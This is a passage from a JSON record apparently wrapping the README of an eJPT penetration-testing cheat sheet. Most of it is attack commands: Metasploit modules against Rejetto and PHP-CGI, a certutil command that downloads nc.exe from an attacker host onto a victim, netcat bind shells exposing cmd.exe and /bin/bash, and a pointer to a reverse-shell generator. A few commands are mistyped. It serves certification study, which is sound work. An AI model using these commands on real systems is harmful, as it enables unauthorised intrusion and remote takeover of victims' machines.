RHOSTS \u003ctarget-IP\u003e\nrun\n```\n\u003e exploit the rejetto vulnerability\n\n\n#### GUI metasploit\n\n```shell\nservice postgresql start\nmsfconsole\narmitage\n```\n\u003e lounch the GUI of metasploit\n\n\n\n#### Netcat \u0026 blind shell\n\n```shell\nnc -nvlp \u003cport\u003e\n```\n\u003e list that given port\n\n- first we send the nc.exe to the target system\n- `/usr/share/windows-binaries` is the path of nc.exe and use `python -m SimpleHTTPServer 80` then open target browser entry attacker ip and download nc.exe\n- `certutil -urlcache -f http://\u003cattacker-IP\u003e/nc.exe nc.exe` run this on victum system cmd to get the nc.exe instead of open browser and enter ip to dowload\n\n***for Window***\n\n```shell\nnc.exe -nvlp 1234 -e cmd.exe\n```\n\u003e run on victum system cmd (window)\n\n```shell\nnc -nv \u003ctarget-IP\u003e 1234\n```\n\u003e run this on attacker system to get the remote access of victum\n\n***for linux***\n\n```shell\nnc.exe -n nvlp 1234 -c /bin/bash\n```\n\u003e run on victum system cmd (linux system)\n\n```shell\nnc -nv \u003ctarget-IP\u003e 1234\n```\n\u003e run this on attacker system to get the remote access of victum\n\n***cheatSheet***\n\n```url\nhttps://www.revshells.com/\n```\n\u003e There is a website where we can generate a reverse shell payload by entering the attacker's IP address and port (e.g., 1234). After generating the payload, we execute the `nc -nvlp 1234` command on the attacker's system to start a listener. Once the generated payload is executed on the victim's system on cmd, it establishes a connection back to the attacker's machine, granting remote access.\n\n\n#### Exploit PHP\n\n```url\nurl/phpinfo.php\n```\n\u003e version lower then 5.3.1\n\n```shell\nmsfconsole\nuse exploit/multi/http/php_cgi_arg_injection\nset RHOSTS demo.ine.local\nrun\n```\n\n#### \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradeelahmad%2Fejpt-cheatsheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fradeelahmad%2Fejpt-cheatsheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradeelahmad%2Fejpt-cheatsheet/lists"}